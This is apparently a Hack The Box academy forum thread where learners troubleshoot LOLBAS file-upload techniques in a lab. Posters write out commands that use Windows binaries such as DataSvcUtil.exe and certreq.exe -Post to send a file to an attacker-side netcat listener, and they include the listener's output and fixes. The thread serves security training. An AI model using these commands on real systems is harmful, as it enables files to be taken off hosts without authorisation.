HTB:
Resources:
https://lolbas-project.github.io/#/upload
Experimenting with various upload methods and I can’t seem to get any of them to work. They all have similar behavior. I start a netcat session:
sudo nc -lvnp 80
I then follow the commands on the LOLBAS page, for example:
PS C:\Users\htb-student> C:\Windows\Microsoft.NET\Framework64\v4.0.30319\DataSvcUtil.exe /out:C:\Users\htb-student\Test.txt /uri:http://10.10.16.50/test.txt
My netcat session detects a connection, but no file is uploaded.
└─$ sudo nc -lvnp 80
listening on [any] 80 ...
connect to [10.10.16.50] from (UNKNOWN) [10.129.201.55] 49679
GET /test.txt/$metadata HTTP/1.1
Host: 10.10.16.50
Connection: Keep-Alive
Attempting to use certreq.exe gives a different error:
C:\Windows\System32\certreq.exe -Post -config http://10.10.16.50/ C:\Users\htb-student\Test.txt
Certificate Request Processor: The parameter is incorrect. 0x80070057 (WIN32: 87 ERROR_INVALID_PARAMETER)
I’m feeling your pain here at the moment!
Certificate Request Processor: The parameter is incorrect. 0x80070057 (WIN32: 87 ERROR_INVALID_PARAMETER)
I believe the reason for that is an older version of CertReq
. They do give a link to a new version of it in the article, however that obviously means we need to find another way to download THAT file to the computer.
Since I really wanted to try to get the CertReq
working, I just used wget
get download the newer exe. Unfortunately I then hit another obstacle - I realised that this requires it to be a POST
request, and serving up the file via a Python web server or the like doesn’t do this by default.
I tried using bitsadmin
as per instructions in the same academy section, and that gave its own unique types of errors (The parameter is incorrect.
).
I do think it would be helpful if the exercises could be run on a target machine that actually had working versions of the methods that we’re being told to practice with. There’s “learning based on practice” and then there’s “learning based on hitting your head against a wall”.
I totally agree!
Glad it wasn’t just me. Never found a solution to this. Eventually I gave up and moved on!
Greetings to all.
When the new certreq.exe is downloaded (by many different ways) on the target machine, make sure to include the filepath of the new file, and then fill in the rest of the code, otherwise you would still be running the older version. Another issue was that NC listening port might not be working ( Ncat: bind to 0.0.0.0:80: Address already in use. QUITTING.) In this case just try another http port.
Persistence is a virtue!